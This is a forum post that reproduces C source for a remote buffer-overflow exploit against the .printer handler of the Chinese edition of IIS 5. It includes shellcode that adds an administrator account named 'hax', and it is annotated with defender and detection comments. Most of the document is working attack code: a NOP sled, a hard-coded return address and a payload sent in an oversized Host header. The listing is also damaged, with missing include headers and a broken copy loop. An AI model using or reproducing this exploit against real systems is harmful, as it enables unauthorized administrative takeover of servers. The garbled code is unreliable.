
IIS5 中文版.printer远程攻击程序源代码

/*************************************************************/
/* IIS5 (Chinese edition) .printer remote attack program     */
/* Tested successfully on Win2k Advanced Server              */
/* (Chinese edition, 5.00.2195)                              */
/* Usage: cniis [sp type]                                    */
/* sp type: 0 ---- no SP (default)                           */
/*          1 ---- SP1                                       */
/* If the attack succeeds, a user in the Administrators      */
/* group is added on the target machine:                     */
/* user: hax, password: hax                                  */
/*                                                           */
/* v0.2 added support for attacking SP1                      */
/*                                                           */
/* http://isno.yeah.net                                      */
/*************************************************************/
/*
 * NOTE(review): this listing is damaged as published. The header names
 * after each #include and some bracketed text are missing, so it does
 * not compile as shown. It is kept token-for-token as it appears on the
 * page; only comments have been added or translated.
 *
 * Defender summary (from the visible code): the program sends one HTTP
 * GET for a ".printer" resource to TCP port 80 with an oversized, mostly
 * non-printable Host header. Relevant controls are the vendor fix for
 * the IIS 5 .printer handler overflow on Windows 2000 and, where
 * Internet Printing is not needed, removal of the .printer script
 * mapping. The stated post-compromise effect is a new local account
 * "hax" in the Administrators group, which is directly auditable.
 */
#include
#include
#include
#include
#include

/* Prints the command-line help and terminates the process with status 1. */
void usage(char* prog);

/*
 * Entry point: builds the request in a fixed 857-byte buffer, connects to
 * argv[1] on port 80, sends the buffer once and exits.
 *
 * argv[1] is the host name passed to gethostbyname(); the optional
 * argv[2] is the "sp type" (0 or 1 per the usage text) and selects one of
 * two hard-coded 4-byte values below.
 * Returns 0 after sending; exits with 1 on bad argument count or when
 * connect() fails.
 */
int main (int argc, char *argv[])
{
    /* This shellcode add a Administrators User hax */
    /* hax's password is also hax, write by isno,5.2001 */
    /*
     * Analyst note: the immediate constants in this byte string are
     * printable ASCII that spell out a "net user ... /add" followed by a
     * "net localgroup Administrators ... /add" command line, consistent
     * with the author's description. Detection: a new local account and
     * an Administrators group membership change on a web server, and a
     * command interpreter started from the web server process.
     */
    unsigned char shellcode[] =
        "\x90\x55\x53\x8B\xEC\x33\xDB\x53\x83\xEC\x3C\xB8"
        "\x6E\x65\x74\x20\x89\x45\xC3\xB8\x75\x73\x65\x72"
        "\x89\x45\xC7\xB8\x20\x68\x61\x78\x89\x45\xCB\x89"
        "\x45\xCF\xB8\x20\x2F\x61\x64\x89\x45\xD3\xB8\x64"
        "\x26\x6E\x65\x89\x45\xD7\xB8\x74\x20\x6C\x6F\x89"
        "\x45\xDB\xB8\x63\x61\x6C\x67\x89\x45\xDF\xB8\x72"
        "\x6F\x75\x70\x89\x45\xE3\xB8\x20\x41\x64\x6D\x89"
        "\x45\xE7\xB8\x69\x6E\x69\x73\x89\x45\xEB\xB8\x74"
        "\x72\x61\x74\x89\x45\xEF\xB8\x6F\x72\x73\x20\x89"
        "\x45\xF3\xB8\x68\x61\x78\x20\x89\x45\xF7\xB8\x2F"
        "\x61\x64\x64\x89\x45\xFB\x8D\x45\xC3\x50\xB8\xAD"
        "\xAA\x01\x78\xFF\xD0\x8B\xE5\x5B\x5D\x03\x03\x03";
    char sploit[857];           /* whole HTTP request, zero-filled before use */
    /* Request line; its 26 characters are why the write cursor starts at index 26. */
    char request[]="GET /NULL.printer HTTP/1.0";
    char *finger;               /* write cursor into sploit */
    int i,X,sock;
    int sp=0;                   /* service-pack selector, default 0 (no SP) */
    unsigned short serverport=htons(80);
    struct hostent *nametocheck;
    struct sockaddr_in serv_addr;
    struct in_addr attack;
    WORD werd;
    WSADATA wsd;

    /* Winsock 2.0 start-up; the return value is not checked. */
    werd= MAKEWORD(2,0);
    WSAStartup(werd,&wsd);

    if(argc<2||argc>3)
        usage(argv[0]);
    if(argc==3)
        sp=atoi(argv[2]);

    /* Resolve the host name and keep the first address (4 bytes copied). */
    nametocheck = gethostbyname (argv[1]);
    memcpy(&attack.s_addr,nametocheck->h_addr_list[0],4);

    memset(sploit,0x00,857);
    strcpy(sploit,request);
    finger=&sploit[26];         /* first byte after the request line */

    /* CRLF, then the literal header name "Host: ". */
    *(finger++)=0x0d;
    *(finger++)=0x0a;
    *(finger++)='H';
    *(finger++)='o';
    *(finger++)='s';
    *(finger++)='t';
    *(finger++)=':';
    *(finger++)=' ';

    /*
     * Host header value: 268 bytes of 0x90, a 4-byte value, four more
     * 0x90 bytes, then the byte string above.
     * Detection: a legitimate Host header is a short printable host name;
     * a value of several hundred bytes of 0x90 on a request for a
     * ".printer" URL is the network and web-log signature of this request.
     */
    for(i=0;i<268;i++)
        *(finger++)=(char)0x90;

    /* Hard-coded, build-specific 4-byte value chosen by the sp argument. */
    if(sp==0)
    {
        /* jmp esp in User32.dll(5.0.2180.1) */
        *(finger++)=(char)0x2a;
        *(finger++)=(char)0xe3;
        *(finger++)=(char)0xe2;
        *(finger++)=(char)0x77;
    }
    else
    {
        /* Used for any non-zero sp value; the author gives no source for it. */
        *(finger++)=(char)0x8b;
        *(finger++)=(char)0x89;
        *(finger++)=(char)0xe6;
        *(finger++)=(char)0x77;
    }

    *(finger++)=(char)0x90;
    *(finger++)=(char)0x90;
    *(finger++)=(char)0x90;
    *(finger++)=(char)0x90;

    /* Append the byte string (statement kept exactly as it appears on the page). */
    for(i=0;shellcode!=0x00;i++)
        *(finger++)=shellcode;

    /* Blank line ends the HTTP headers; the trailing NUL bounds strlen() below. */
    *(finger++)=0x0d;
    *(finger++)=0x0a;
    *(finger++)=0x0d;
    *(finger++)=0x0a;
    *(finger++)=0x00;

    /* printf(sploit); */

    /* Plain TCP connection to the resolved address on port 80. */
    sock = socket (AF_INET, SOCK_STREAM, 0);
    memset (&serv_addr, 0, sizeof (serv_addr));
    serv_addr.sin_family=AF_INET;
    serv_addr.sin_addr.s_addr = attack.s_addr;
    serv_addr.sin_port = serverport;
    X=connect (sock, (struct sockaddr *) &serv_addr, sizeof (serv_addr));
    if(X!=0)
    {
        /* The format string has no conversion, so the address argument is never printed. */
        printf("Couldn't connect\n",inet_ntoa(attack));
        exit(1);
    }

    /* Single send; no response is read, so the program cannot tell whether the request had any effect. */
    send(sock, sploit, strlen(sploit),0);
    Sleep(1000);
    printf("\nSP type: %d\n",sp);
    printf("\nShellcode sended!\n");
    printf("If success,the target host will add a Admin User named hax,its passwd is hax.\n");
    printf("Good luck!!!\n\n");
    closesocket(sock);
    return 0;
}

/*
 * Prints the banner and usage text, using prog as the program name, then
 * terminates the process with exit status 1. Does not return.
 */
void usage(char* prog)
{
    printf("\n%s -- IIS5 Chinese version .printer remote exploit\n",prog);
    printf(" write by isno \n\n");
    printf("Usage: %s [sp type] \n",prog);
    printf("sp type: 0 ---- no SP (default) \n");
    printf(" 1 ---- SP1 \n");
    exit(1);
}

IIS5 中文版.printer远程攻击程序源代码

斑竹请转到【黑客编程/软件应用】吧。


IIS5 中文版.printer远程攻击程序源代码

好东西,

